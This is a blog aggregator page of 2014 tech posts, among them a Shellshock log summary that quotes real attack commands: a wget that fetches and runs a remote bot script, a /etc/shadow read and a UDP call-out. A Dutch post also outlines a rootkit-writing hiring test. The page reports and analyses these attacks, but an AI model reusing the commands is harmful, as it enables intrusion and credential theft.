http://www.productize.be/driving-ws2812-programmable-rgb-leds-using-hardware-spi/

by Joost Yervante Damad (noreply@blogger.com) at October 07, 2014 07:15 AM

Frank Goossens

Mijn alternatief voor m.deredactie.be

Dat ik niet content was met de vernieuwde mobiele redactie.be schreef ik hier al. Maar commentaar spuien kan iedere blogger, afbreken is makkelijker dan opbouwen en het beste argument is een uitgewerkt alternatief. Vandaar; ik werkte de afgelopen maanden tussen de soep en de patatten aan een eigen “progressive enhanced” Proof of Concept van een mobiele deredactie.be (in PHP) die op alle browsers werkt, minder mobiele data verbruikt en sneller rendert (hier moet ge zijn, ongeduldigaard).

Waarom ik denk dat deze aanzet beter is dan de officiële versie van de VRT? Wel, de POC

Je kunt:

Een paar technische feitjes;

Zo, dat is het zo wat. Bekijk het eens, geef commentaar, fork op GitHub, fix bugs, voeg features toe. Maar wat je ook doet, vergeet niet dat de content van VRT is en blijft en dat je daar dus niet zomaar wat mee kunt doen.

by frank at October 07, 2014 04:59 AM

October 05, 2014

Mattias Geniar

Compress a PDF file on Linux via the CLI

If you're processing large PDF files, you may want to optimize the filesize. Here's what I found to be working. These tools all require Ghostscript.

$ yum install ghostscript
$ apt-get install ghostscript

Convert the PDF to the "ebook" format. For a few tests, this took 65% of the original filesize (18MB to 6MB).

$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook \
       -dNOPAUSE -dBATCH  -dQUIET -sOutputFile=output.pdf input.pdf

If you want to try, you can also try the "screen" format. This reduced the test PDFs from 18MB to 1.5MB, so a very large reduction, but image quality inside the PDF was no longer up to the standards.

$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen \
       -dNOPAUSE -dBATCH  -dQUIET -sOutputFile=output.pdf input.pdf

I've read reports that using ghostscript to convert the PDF to GhostScript format and back to PDF can also substantially reduce the filesize. My tests did not confirm this, I ended up with files +15% larger. You'll need to test this for your own needs.

$ pdf2ps original.pdf original.ps
$ ps2pdf original.ps new.pdf

And when all else fails, just compress the file with zip (zip instead of gzip/tar, to help our Windows friends with opening the files more easily).

$ zip file.zip original.pdf

Should anyone else have more tips, I'd love to hear them!

by Mattias Geniar at October 05, 2014 12:52 PM

October 03, 2014

Frank Goossens

Music from Our Tube; Lizzy Parks’ Prayer

My wife loves vocal jazz and while listening to one of the many online streaming radio stations during dinner just now, Lizzy Parks’ Prayer grabbed us by the ears;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

The beautiful arrangements remind me of Minnie Ripperton’s “Les Fleurs” (or 4Hero’s almost facsimile rendition). There’s worse then that, I guess?

by frank at October 03, 2014 04:52 PM

Thomas Vander Stichele

I think it’s better to look odd than to look normal

In the fall of ’98 I had a thing for a girl I didn’t want to have a thing for. I had also just seen one of my favorite movies, Much Ado About Nothing (the original Brannagh movie, not the Josh Whedon one that I didn’t know about until recently and have yet to see).

I decided to exorcise my feelings into a good old-fashioned mix cd (well, I guess that wasn’t old fashioned back in ’98). I cut up the movie dialogue into pieces, and interspersed them inbetween a song selection aiming to match the flow of the movie lyric-wise and, in places, matching them sound-wise too to the movie snippets. It ended up being two cd’s, and a bunch of my friends liked it as well so I think I ended up making about 30 copies of the thing.

Today I needed to recreate those two CD’s plus its original packaging. That means I had to actually buy CD-R’s (didn’t have any anymore after the move to the US), buy jewelcases (can you believe that I actually have actual boxes with actual empty jewelcases that I *kept* in storage in Belgium? These days if you want to buy them they’re a little harder to find than they used to be, even though I’m sure there must be landfills full of them all over the world), and go to a print shop to print the front and back covers.

Being the obsessive backupper that I am, it was easy to find the sound files back (actually, I took a morituri rip that I made at my best friend’s house, who has the CD’s, last time I was there – so that I would have a perfect .cue sheet that would stitch the tracks together). I knew I had the files for the fronts and backs somewhere as well, but they were a little harder to find because I couldn’t remember their names. But I trusted my OCD self that I had backups from fifteen years ago somewhere here with me in NY, and I started looking for files from the same timeframe, until I came across the files I was looking for hidden in a subdirectory.

But then when you find them, what do you do with .cdr CorelDraw files from 1998? I tried inkscape, which uses uniconvertor, which on my F-19 machine failed with a constructor with wrong arguments in Python, which seems like a silly bug. I rebuilt the F-21 version, which gets past that bug, but then doesn’t actually convert anything. I tried an online converter, and it only picked up on the images and none of the text.

So I went the illegal route – I downloaded CorelDraw 11 from the internet, installed it in wine (which was surprisingly easy, it just worked), and I could open the files. Except that it was missing fonts and so the layout was all wrong. Sigh. Hunt random font sites for the missing fonts, install them for wine, open again, rinse, repeat. Eventually the files opened with the right fonts, except that one of the titles was too big to fit on the CD inlay. Oh well, adjust them all manually, make it a little smaller, export to eps, load in gimp, adjust the page as it was perfectly measured for A4 printing but I’m in the US now and the US uses letter which is slightly different, export to pdf so I could go to any random print shop in New York and get it printed.

CD burnt, on to the print shop, fiddle with the printer as nobody in the store can figure out which tray number the tray is where they loaded the card stock paper, and it’s not like the driver on the windows machine knows either – I had to do 5 failed prints to different printers before we even knew which printer was the right one. Cut up the paper by hand with scissors (which I suck at), put it all together, and be on my way.

All this just to say that, while I can be as good about backups as I want to be to bring back to life something I did fifteen years ago, there is still a whole lot of real-world technology fails getting in the way, like outdated proprietary file formats, not having good interchange formats, missing fonts, paper sizes and general Imperial/metric nonsense, ages-old printer crap and just simple manual tasks, which we as humans will probably inflict upon ourselves for forever. I mean, I’d sure like to believe that in the future it will be as simple as pressing a button and getting this 15 year old CD project 3D-printed all at once, but experience has taught me that most likely I will be fiddling just as much with getting 2040′s 3D printer to work with 2025′s data files.

And so it is that I arrive just after 6 at Barnes and Noble in Tribeca, queue up in front of eight registers with only one open, buy a book, get a wristband, go to the back where Emma Thompson is reading from her Peter Rabbit book, in her perfectly English and genuinely funny way, queue after the reading, and hear her say “I think it’s better to look odd than to look normal” to the seven year old twin girls in front of me. I wholeheartedly agree with her. I hand her my copy to sign, give her my two cd’s and tell her what they are and say that I thought this was a good opportunity to give them to her, and she smiles and seems genuinely surprised and pleased.

I think my dad would be genuinely jealous at this point – he always seemed to appreciate seeing her on the screen, and after today I can’t say I blame him. I hope she enjoys the CD’s, and if someone can recommend a good website where I can put these online for others to listen to, that would be great!

flattr this!

by Thomas at October 03, 2014 04:19 PM

Mattias Geniar

Sysdig CLI examples

Here are some SysDig examples for your CLI. Looking for an easy way to install SysDig on your servers? Check out my puppet-sysdig module if you're a Puppet user.

Observe the I/O activity on all the files named 'passwd'

$ sysdig -A –c echo_fds "fd.filename=passwd"

See the top directories in terms of R+W disk activity

$ sysdig –c fdbytes_by fd.directory  "fd.type=file"

Print the top files that apache has been reading from or writing to

$ sysdig -c topfiles_bytes proc.name=httpd

See the top files in terms of read+write bytes

$ sysdig -c topfiles_bytes

List the processes that are using a high number of files

$ sysdig -c fdcount_by proc.name "fd.type=file"

See the top processes in terms of disk bandwidth usage

$ sysdig -c topprocs_file

See the top client IPs: in terms of total bytes

$ sysdig -c fdbytes_by fd.cip

See the top client IPs: in terms of established connections

$ sysdig -c fdcount_by fd.cip "evt.type=accept"

See the top local server ports: in terms of established connections

$ sysdig -c fdcount_by fd.sport "evt.type=accept"

Show network data exchanged with a specific host IP

As ASCII:

$ sysdig -s2000 -A -c echo_fds fd.cip=10.3.6.1

As binary:

$ sysdig -s2000 -X -c echo_fds fd.cip=10.3.6.1

Show all syslog messages from the system, conveniently color coded

$ sysdig -c spy_syslog

by Mattias Geniar at October 03, 2014 02:42 PM

October 02, 2014

Wim Leers

Render caching in Drupal 7 and 8

Together with Fabian Franz & Marco Molinari from Tag1 Consulting, I had a session about render caching in Drupal 7 and 8 at DrupalCon Amsterdam.

Marco explained the render performance problems in Drupal 7, the way the Render Cache module for Drupal 7 mitigates these performance problems as well as possible in Drupal 7, but can’t solve everything, because the necessary mechanisms to solve it properly aren’t available there. I explained how cache tags in Drupal 8 have fixed this problem in Drupal 8 completely. And Fabian demonstrated very cool things for the near future: different rendering strategies, such as Facebook’s Big Pipe — which already works in the render_cache module for Drupal 7, and will only be simpler to implement in Drupal 8!

by Wim Leers at October 02, 2014 12:43 AM

October 01, 2014

Dries Buytaert

State of Drupal presentation (September 2014)

I gave my traditional State of Drupal presentation this week at DrupalCon Amsterdam. I decided to talk about the sustainability and scalability of the Drupal community. In case you didn't attend DrupalCon Amsterdam, you can watch the recording of my keynote, download a copy of my slides (PDF, 17 MB) or read my blog post on the topic.

by Dries at October 01, 2014 12:41 PM

Drupal 8 beta 1 released

Topic: 

Today we announced Drupal 8 beta 1! This key milestone is the work of over 2,300 people who have contributed more than 11,500 committed patches to 15 alpha releases, and especially the 234 contributors who fixed 178 "beta blocker" issues. A massive thank-you to everyone who helped get Drupal 8 beta 1 done.

For more information on the beta, please read the beta 1 release announcement. To read about the new features in Drupal 8, see Drupal.org's Drupal 8 landing page.

Betas are for developers and site builders who are comfortable reporting (and where possible, fixing) their own bugs, and who are prepared to rebuild their test sites from scratch if necessary. Beta releases are not recommended for non-technical users, nor for production websites.

by Dries at October 01, 2014 09:21 AM

September 30, 2014

Xavier Mertens

BruCON 0x06 Network Review

Network AccessOnce again, here is my quick review about the BruCON network that we deployed for our beloved attendees! Yes, we are glad to take care of your packets during the conference. Nothing changed since the last edition, we deployed the same network in the same venue with the same controls in place. But this year, the biggest change was our brand new wall of sheep…

Let’s start with some stats! Our Internet bandwidth was the same as last year: a 100Mbits wireless link. This is was enough as we had peaks up to 80 Mbits of traffic. Hélas, our partner which provides the Internet pipe is still not ready to deliver IPv6.

Traffic Overview

(Click to enlarge)

We provide two networks: a “public” for the visitors and a “private” one for the crew, the speakers which is not sniffed. The Wi-Fi network is the most used but more and more people decided to stick to 3G/4G connectivity to avoid connecting to the wild network. We detected 334 unique MAC addresses which requested an IP address during the conference. The split across the different client types is shown below.

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

(Click to enlarge)

About the applications used, HTTP remains in first position, not a surprise. If HTTP remains the top protocol, SSL & OpenVPN came in 2nd and 3rd position. This means that people also tend to use encrypted communications.

(click to enlarge)

(click to enlarge)

DNS is always a goldmine.  Here is a top-20 of requests that we captured (based on DNS traffic, whatever DNS servers were used!). To clean up the mess, I removed the PTR requests.

Count Query
28847 google
25334 a.t
19089 google.com
11895 wpad
9113 t.co
5738 brucon
5487 brucon.org
4917 apple.com
4102 ey.net
3956 pentesteracademy
3733 appspot.l.google.com
3697 pentesteracademylab.appspot.com
3434 printer
3314 facebook.com
3158 amazon.com
2773 images.amazon.com
2752 ecx.images-amazon.com
2730 twitter.com
2520 ssl
2422 clients.l.google.com

Personnally, next year, I’d like to create some honeypots to redirect the traffic to hosts like “wpad” (Web Proxy Autodiscovery Protocol) or “printer” ;-). We provided a DNS server via DHCP but many people have fixed DNS servers configured. Funny, lot of them where RFC1918 IP addresses not used on the BruCON network. Corporate servers?

Count DNS Server
131815 10.4.0.1 (BruCON official DNS)
73294 224.0.0.251
32559 ff02::fb
14887 224.0.0.252
13939 ff02::1:3
6544 8.8.8.8 (Google)
2294 172.246.84.42
883 8.8.4.4 (Google)
565 86.39.202.67
500 208.67.222.222 (OpenDNS)

We detected network flows with ~25K unique hosts over the world. Mainly to the Europe and United States.

Connections Map

(Click to enlarge)

It’s also interesting to search for errors or “weird” traffic. Here is the top-20 of problems/suspicious traffic detected by Bro:

Count> Suspicious Behavior
7891 dns_unmatched_msg
3578 dns_unmatched_reply
1607 data_before_established
1456 unmatched_HTTP_reply
1342 possible_split_routing
1017 unescaped_special_URI_char
1015 window_recision
884 line_terminated_with_single_CR
811 above_hole_data_without_any_acks
734 TCP_ack_underflow_or_misorder
453 unknown_packet_type
350 dns_unmatched_msg_quantity
294 DNS_Conn_count_too_large
284 TCP_seq_underflow_or_misorder
270 unknown_protocol_2
210 zero_length_ICMPv6_ND_option
178 non_ip_packet_in_egre
177 bad_HTTP_request
173 connection_originator_SYN_ack
169 inflate_failed

We also provider a Tor SOCKS proxy to the visitors but it was not eavily used… Maybe promote it more next year? But the brand new wall of sheep was a great success. It is a modified version of Dofler and offers the following features:

(Click to enlarge)

(Click to enlarge)

Displaying pictures on the fly is dangerous when hackers will be the primary target. That’s why I implemented a skin-color detection filter to prevent most of the p0rn images to be displayed on the wall-of-sheep. Of course, it became quickly a new game for some attendees who tried to display all kind of (not only p0rn) pictures. Most of the time they succeeded but the filter was working quite well nevertheless. Check the two following impressive numbers:

About the captured accounts, even if people are more aware and are trying to protect themselves, we collected 242 accounts:

That’s all for my wrap-up!

by Xavier at September 30, 2014 07:06 PM

Frank Goossens

Amazed by Autoptimize take-up

autoptimize at +200K downloads, wow!Less then a year after reaching 100000 downloads, Autoptimize broke the 200000 barrier just last week.

It’s also exiting to see how people are blogging (or tweeting) about it as well;

So yeah, I’m pretty amazed by how well Autoptimize is doing. Thanks for the confidence!

by frank at September 30, 2014 06:46 PM

Xavier Mertens

Online Router Forensics Lab

Crime SceneWhen my friend Didier Stevens contacted me last year to help him with a BruCON 5×5 project, I simply could not decline! Didier developed a framework to perform forensic investigations on Cisco routers. His framework is called NAFT (“Network Appliance Forensic Toolkit”). It is written in Python and provides a good toolbox to extract juicy information from routers memory. From a development point of view, the framework was ready but Didier has the great idea to prepare a workshop to train student to analyze router memory images. The 5×5 project was accepted and thanks to the support of BruCON, it was possible to buy a bunch of Cisco routers to let students play with them. Why hardware routers and not simply a virtual lab (after all we are living in the virtualisation era)? For two main reasons: To avoid licensing issues and a virtual lab does not offer the ROMMON feature which is very useful to take a memory image of the router. The very first workshop was given last week during BruCON as a first premiere. With a fully booked room of people (40), it was a success and we already got good feedbacks. But not all people are able to attend security conferences and workshops, that’s why Didier had the idea to implement an online lab where registered people could perform the same investigations as in the live workshop. That’s where I was involved in the project!

Here are a few words about the lab that has been deployed. It is based on a hardened Linux server and two Cisco 2610 routers connected together. The private network is available to generate some IP traffic. The routers serial consoles are also connected. Here is a small schema of the lab:

NAFT Lab Topology

The Cisco routers can be managed via a telnet connection or via their console port. All tools are pre-installed to perform the memory dump analysis:

To access the lab, you just need a SSH client:

Click to enlarge

The lab is available to anybody who would like to test Didier’s framework. We also opened a website with information about the project and a booking system. You just have to select the day(s) and fill a small form. Once approved, a temporary account will be created and credentials will be sent.

Presented as an exclusivity during BruCON, Didier and myself are happy to announce that the lab is publicly available right now via router-forensics.net. If you’re interested in a workshop for your school, your event, feel free to contact us! We have routers ready on the road ;-) The next workshop has been scheduled during Hack.lu in Luxembourg.

Routers on the Road

by Xavier at September 30, 2014 02:38 PM

Dieter Plaetinck

A real whisper-to-InfluxDB program.

The whisper-to-influxdb migration script I posted earlier is pretty bad. A shell script, without concurrency, and an undiagnosed performance issue. I hinted that one could write a Go program using the unofficial whisper-go bindings and the influxdb Go client library. That's what I did now, it's at github.com/vimeo/whisper-to-influxdb. It uses configurable amounts of workers for both whisper fetches and InfluxDB commits, but it's still a bit naive in the sense that it commits to InfluxDB one serie at a time, irrespective of how many records are in it. My series, and hence my commits have at most 60k records, and presumably InfluxDB could handle a lot more per commit, so we might leverage better batching later. Either way, this way I can consistently commit about 100k series every 2.5 hours (or 10/s), where each serie has a few thousand points on average, with peaks up to 60k points. I usually play with 1 to 30 InfluxDB workers. Even though I've hit a few InfluxDB issues, this tool has enabled me to fill in gaps after outages and to do a restore from whisper after a complete database wipe.

September 30, 2014 12:37 PM

Dries Buytaert

Scaling Open Source communities

Topic: 

We truly live in miraculous times. Open Source is at the core of the largest organizations in the world. Open Source is changing lives in emerging countries. Open Source has changed the tide of governments around the world. And yet, Open Source can be really difficult. Open Source can be largely a thankless job. It is hard to find volunteers, it is hard to find organizations to donate time or money, it is hard to organize the community, it is hard to learn, it is hard to attract full-time contributors, and more. As the project lead for Drupal, one of the largest Open Source projects/communities in the world, I live these challenges every day. In this blog post, I will analyze the challenge with scaling Open Source communities and recommend a solution for how to build very large Open Source communities.

Open Source projects are public goods

In economic terms, for something to be a "public good", it needs to match two criteria:

  1. non-excludability - it is impossible to prevent anyone from consuming that good, and
  2. non-rivalry - consumption of this good by anyone does not reduce the benefits available to others.

Examples of public goods include street lighting, national defense, public parks, basic education, the road system, etc. By that definition, Open Source software is also a "public good": we can't stop anyone from using Open Source software, and one person benefiting from Open Source software does not reduce the benefits available to others.

The realization that Open Source is a public good is a helpful one because there has been a lot of research about how to maintain and scale public goods.

Public goods and the free-rider problem

The biggest problem with public goods is the "free rider problem". A free rider is someone who uses a public good but who does not pay anything (or pay enough) towards its cost or production. If the maintainers of a public good do not address the free-rider problem it can lead to the non-production or under-production of a public good. This is generally known as the "Tragedy of the Commons".

In Open Source, a free-rider is someone who uses an Open Source software project without contributing to it. If too few people or organizations contribute to the project, the project can become unhealthy, and ultimately could cease to exist.

The free-rider problem is typical for public goods and does not usually arise with private businesses. For example, community-maintained software like Drupal may have many free riders but proprietary competitors like Adobe or Sitecore have no problem excluding those who will not pay a license fee.

To properly understand the free-rider problem and public good provision, we need to understand both self-interest theory and the theory of collective action. I'll discuss both theories and apply them to Open Source.

Self-interest theory

Open Source contributors do amazing things. They contribute to fixing the hardest problems, they share their expertise, and more. Actions like these are often described as altruistic, in contrast to the pursuit of self-interest. In reality, generosity is often driven by some level of self-interest: we provide value to others when it benefits ourselves.

Many reasons exist why people contribute to Open Source projects; people contribute because they enjoy being part of a community of like-minded people, to hone their technical skills, to get recognition, to try and make a difference in the world, because they are paid to, or for different forms of "social capital". Often we contribute because by improving the world we are living in, we are making our world better too.

Modern economics suggest that both individuals and organizations tend to act in their own self-interest, bound by morals, ethics, the well-being of future generations and more. The theory of self-interest goes back to the writings of the old Greeks, is championed by early modern economists, and is still being adhered to by late-modern economists. It follows from the theory of self-interest that we'd see more individuals and organizations contribute if they received more benefits.

While contributing to Open Source clearly has benefits, it is not obvious if the benefits outweigh the cost. If we can increase the benefits, there is no doubt we can can attract more contributors.

Collective action theory

The theory of self-interest also applies to groups of individuals. In his seminal work on collective action and public goods, economist Mancur Olson shows that the incentive for group action diminishes as group size increases. Large groups are less able to act in their common interest than small ones because (1) the complexity increases and (2) the benefits diminish.

We see this first hand in Open Source projects. As an Open Source project grows, aspects of the development, maintenance and operation have to be transferred from volunteers to paid workers. Linux is a good example. Without Red Hat, IBM and Dell employing full-time Linux contributors, Linux might not have the strong market share it has today.

The concept of major public goods growing out of volunteer and community-based models is not new to the world. The first trade routes were ancient trackways, which citizens later developed on their own into roads suited for wheeled vehicles in order to improve commerce. Transportation was improved for all citizens, driven by the commercial interest of some. Today, we certainly appreciate that full-time government workers maintain the roads. Ditto for the national defense system, basic education, etc.

The theory of collective action also implies that as an Open Source project grows, we need to evolve how we incent contributors or we won't be able to attract either part-time volunteers or full-time paid contributors.

Selective benefits

Solutions for the free-rider problem and collective action problem exist, and this is where Open Source can learn from public goods theory and research. The most common solution for the free-rider problem is taxation; the government mandates all citizens to help pay for the production of the public good. Taxpayers help pay for our basic education system, the road system and national defense for example. Other solutions are privatization, civic duty or legislation. These solutions don't apply to Open Source.

I believe the most promising solution for Open Source is known as "privileged groups". Privileged groups are those who receive "selective benefits". Selective benefits are benefits that can motivate participation because they are available only to those who participate. The study of collective action shows that public goods are still produced when a privileged group benefits more from the public good than it costs them to produce it.

In fact, prominent "privileged groups" examples exist in the Open Source community; Automattic is a privileged group in the WordPress community as it is in a unique position to make many millions of dollars from WordPress.com. Mozilla Corporation, the for-profit subsidiary of the Mozilla Foundation, is a privileged group as it is in a unique position to get paid millions of dollars by Google. As a result, both Automattic and Mozilla Corporation are willing to make significant engineering investments in WordPress and Mozilla, respectively. Millions of people in the world benefit from that every day.

Drupal is different from Automattic and Mozilla in that no single organization benefits uniquely from contributing. For example, my company Acquia currently employs the most full-time contributors to Drupal but does not receive any exclusive benefits in terms of monetizing Drupal. While Acquia does accrue some value from hiring the Drupal contributors that it does, this is something any company can do.

Better incentives for Drupal contributors

It's my belief that we should embrace the concept of "privileged groups" and "selective benefits" in the Drupal community to help us grow and maintain the Drupal project. Furthermore, I believe we should provide "selective benefits" in a way that encourages fairness and equality, and doesn't primarily benefit any one particular organization.

From the theory of self-interest it follows that to get more paid core contributors we need to provide more and better benefits to organizations that are willing to let their employees contribute. Drupal agencies are looking for two things: customers and Drupal talent.

Many organizations would be eager to contribute more if, in return, they were able to attract more customers and/or Drupal talent. Hence, the "selective benefits" that we can provide them are things like:

  • Organizational profile pages on drupal.org with badges or statistics that prominently showcase their contributions,
  • Advertising on the drupal.org in exchange for fixing critical bugs in Drupal 8 (imagine we rewarded each company that helped fix a critical Drupal 8 bug 10,000 ad views on the front page of drupal.org),
  • Better visibility on Drupal.org's job board for those trying to hire Drupal developers,
  • The ability to sort the marketplace by contributions, rather than just alphabetically
  • ...

I'm particularly excited about providing ads in exchange for contributing. Contributing to Drupal now becomes a marketing expense; the more you contribute, the more customers you can gain from drupal.org. We can even direct resources; award more ad views in exchange for fixing UX problems early in the development cycle, but award critical bugs and beta blockers later in the development cycle. With some relatively small changes to drupal.org, hiring a full-time core developer becomes a lot more interesting.

By matching the benefits to the needs of Drupal agencies, we candirect more resources towards Drupal development. I also believe this system to be fair; all companies can choose to contribute to Drupal 8 and earn advertising credits, and all participants are rewarded equally. We can turn Drupal.org into a platform that encourages and directs participation from a large number of organizations.

Systems like this are subject to gaming but I believe these challenges can be overcome. Any benefit is better than almost no benefit. In general, it will be interesting to see if fairness and heterogeneity will facilitate or impede contribution compared to Open Source projects like WordPress and Mozilla, where some hold unique benefits. I believe that if all participants benefit equally from their contributions, they have an incentive to match each other's contributions and it will facilitate the agreement and establishment of a contribution norm that fosters both cooperation and coordination, while minimizing gaming of the system. In contrast, when participants benefit very differently, like with WordPress and Mozilla, this decreases the willingness to cooperate, which, in turn, could have detrimental effects on contributions. While not necessarily the easiest path, I believe that making the system fair and heterogeneous is the "Drupal way" and that it will serve us in the long term.

Conclusions

There are plenty of technical challenges ahead of us that we need to work on, fun ideas that we should experiment with, and more. With some relatively small changes, we could drastically change the benefits of contributing to Drupal. Better incentives mean more contributors, and more contributors mean that we can try more things and do things better and faster. It means we can scale Drupal development to new heights and with that, increase Open Source's impact on the world.

(I talked about this in my DrupalCon Amsterdam keynote. If you're hungry for more, I recommend that you check out my slides.)

by Dries at September 30, 2014 09:47 AM

Philip Van Hoof

nrl:maxCardinality one-to-many ontology changes

I added support for changing the nrl:maxCardinality property of an rdfs:Property from one to many. Earlier Martyn Russel reverted such an ontology change as this was a blocker for the Debian packaging by Michael Biebl.

We only support going from one to many. That’s because going from many to one would obviously imply data-loss (a string-list could work with CSV, but an int-list can’t be stored as CSV in a single-value int type – instead of trying to support nonsense I decided to just not do it at all).

More supported ontology changes can be found here.

Not sure if people care but this stuff was made while listening to Infected Mushroom.

by admin at September 30, 2014 12:12 AM

September 29, 2014

Philip Van Hoof

Bescherm ons tegen afluisteren, luister zelf enkel binnen een wettelijk kader af

De overheid hoort onze burgers te beschermen tegen afluisteren, de overheid kan en mag zelf afluisteren maar kan en mag dit enkel binnen een wettelijk kader doen.

Allerlei zaken tonen aan dat overheden binnen de NAVO alliantie ons land aanvallen met digitale inbraken. Het baart me zorgen.

Technisch betekent dit voor mij dat ons land moet investeren in beveiliging van systemen. Hier hoort kennis en controle over hardware en software op diep niveau bij.

Ik hoop dat Pieter De Crem niet enkel in straaljagers maar ook in het beveiligen van ‘s lands computersystemen investeert.

Dat betekent voor mij kennis en controle op het niveau van de bootloader, de kernel en de hardware. De systemen van de overheid bevatten immers bijzonder veel gegevens van de burger. De systemen van het leger geven dan weer informatie en toegang tot apparatuur die de beveiliging en de vrede van het land garandeert.

Wat betreft de kernel moet een recruit het boek van Robert Love de dagen voor het sollicitatiegesprek doornemen. Hij of zij moet met het Internet als hulp een kernel module kunnen maken. Dat is een minimum.

Een goede technische test zou zijn om een eigen rootkit kernel module te schrijven gedurende de dagen dat het sollicitatiegesprek plaatsvindt (ja, dagen). Hierbij zouden enkele doelstellingen kunnen opgesteld worden: Bv. het verbergen van de .ko file op het filesysteem die eerder met insmod ingeladen werd, het kopiëren van alle uitgaande TCP/IP data naar een verborgen stuk hardware, en zo verder.

Dit laatste zonder veel van het geheugen van de host te verbruiken daar het verborgen stuk HW vermoedelijk trager zal zijn dan de normale netwerk interface (de eth0 t.o.v. bv. 3G). Een oplossing zou kunnen zijn te filteren gecombineerd met af en toe wat packet loss te veroorzaken door verborgen netif_stop_queue en netif_wake_queue calls op de normale netwerk interface te doen. Misschien heeft de recruit wel betere ideeën die moeilijk of niet gedetecteerd kunnen worden? Ik hoop het!

De recruit moet een manier voorzien (die niet vanzelfsprekend is) om commando’s te ontvangen (liefst eentje die moeilijk gedetecteerd kan worden). Misschien het gebruik maken van radio op zo’n manier dat het moeilijk te detecteren is? Ik ben benieuwd.

Hoe meer van dat soort doelstellingen gehaald worden, hoe geschikter de kandidaat.

Wat betreft userland moet een recruit gegeven een stuk code waar een typische bufferoverflow fout in zit die bufferoverflow herkennen. Maar gun uw recruit de tijd en een ontspannen sfeer want onder stress zien enkel de gelukzakken af en toe eens zoiets. Het reviewen van (goede) code is nl. iets dat vele jaren ervaring vraagt (slechte code is eenvoudiger, maar over de slechte code van de wereld, zoals dnsmasq, gaan de hedendaagse security problemen niet. Wel over bv. OpenSSL en Bash).

De daarop volgende vraag zou kunnen zijn om door middel van die bufferoverflow ingevoerde code uit te laten voeren. Dit mag met behulp van het Internet om alle antwoorden te vinden. Extra punten wanneer de uitgevoerde code met of zonder netcat de zaak op een TCP/IP poort available maakt.

De dienst zou bv. een socket server kunnen maken dat een bufferoverflow heeft op de buffer die meegegeven wordt met read(). Dat zou zelfs een junior C developer moeten herkennen.

Dit soort van testen zijn nodig omdat enkel zij die technisch weten (en kunnen implementeren) hoe na een inbraak zichzelf te verbergen, geschikt zijn om het land te verdedigen tegen de NSA en de GCHQ.

Ik ben er van overtuigd dat zij die dit kunnen een redelijk goed moreel compas hebben: Mensen met zo’n inzicht hebben capaciteiten. Zulke mensen hebben daardoor vaak ook een goed doordacht moreel compas. Zolang de overheid haar eigen moreel compas volgt, zijn deze mensen bereid hun kunnen voor de overheid in te zetten.

Meneer de kolonel van het leger moet wel beseffen dat de gemiddelde programmeur eigenlijk gewoon technologie wil doorgronden. Dat die technologie toevallig ook voor bommen gebruikt wordt is niet de schuld van de programmeurs. Dat de kolonel zijn communicatie-technologie vol fouten zit wil niet zeggen dat de programmeurs die deze vinden criminelen zijn. Kolonel meneer zou beter tot Thor bidden dat s’ lands programmeurs er eerder achter komen dan de echte vijand erachter komt.

Maar de wet staat boven de militair. Ze moet gevolgd worden. Ook door de inlichtingendiensten. Het is onze enige garantie op een vrije samenleving: ik wil niet werken of geholpen hebben aan een wereld waarin de burger door technologie vrijheden zoals privacy verliest.

Met vriendelijke groeten,

Philip. Programmeur.

by admin at September 29, 2014 11:45 PM

Xavier Mertens

Some Personal Shellshock Stats

ShellsockIn April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It makes lot of noise across the security community and was even covered by regular media. Such issue could never happen again, right?

Never say never! Last week, a new storm in the Internet with “shellsock” or best known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed looses definitively its pole position on the top threats. It is very easy to exploit, it affects MANY applications or services that spawn other processes using call like system() on PHP or the well-know mod_cgi provided by Apache. Not only public websites can be affected by also some critical services like:

So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!

Some security researchers and bloggers immediately started to scan the Internet to have a better idea of the impact of this vulnerability on public services. Of course, bad guy also started to do the same and my server was hit several times (94). Until today, I detected the following IP addresses:

109.80.232.48
109.95.210.196
119.82.75.205
128.199.223.129
128.204.199.209
166.78.61.142
176.10.107.180
178.32.181.108
2001:4800:7812:514:1b50:2e05:ff04:c849:52116
209.126.230.72
24.251.197.244
54.251.83.67
62.210.75.170
79.99.187.98
80.110.67.10
83.166.234.133
89.207.135.125
89.248.172.139
93.103.21.231

Here is a list of commands/scripts tested:

/bin/ping -c 1 198.101.206.138
/bin/bash -c "echo testing9123123"; /bin/uname -a
/sbin/ifconfig
/bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
/bin/cat /etc/shadow
echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
/bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
/bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
/bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'

Personally, I like the one which tries to use the built-in support of sockets via psuedo files like “/dev/[tcp|udp]/<host>/<port>“. This is a nice feature of bash but it is disabled on most distribution (for security reason presicely).

by Xavier at September 29, 2014 06:59 PM

FOSDEM organizers

Accepted developer rooms

We are pleased to announce the developer rooms that will be organised at FOSDEM 2015. Developer rooms are assigned to self-organising groups to work together on open source projects, to discuss topics relevant to a broader subset of the community, etc. The individual developer room organisers will issue their calls for participation in the next few days. We will update this table with links to the calls for participation. Both days (31 January & 1 February 2015) Topic Call for participation CFP deadline Distributions announcement 2014-12-07 Embedded announcement 2014-12-01 Graphics - TBA Java announcement 2014-12-01 Saturday 31 January 2015舰

September 29, 2014 03:00 PM

Joram Barrez

Webinar ‘Process Driven Spring Applications with Activiti’ now on Youtube

As I mentioned, I did a webinar on Spring Boot + Activiti last week (at 6 am …. yes, it hurt) with my good pal Josh Long. If you missed it, or want to see the awesomeness again, here’s the recording:   On a similar note, the webinar that Josh did before this one, on Spring […]

by Joram Barrez at September 29, 2014 10:46 AM

September 27, 2014

Damien Sandras

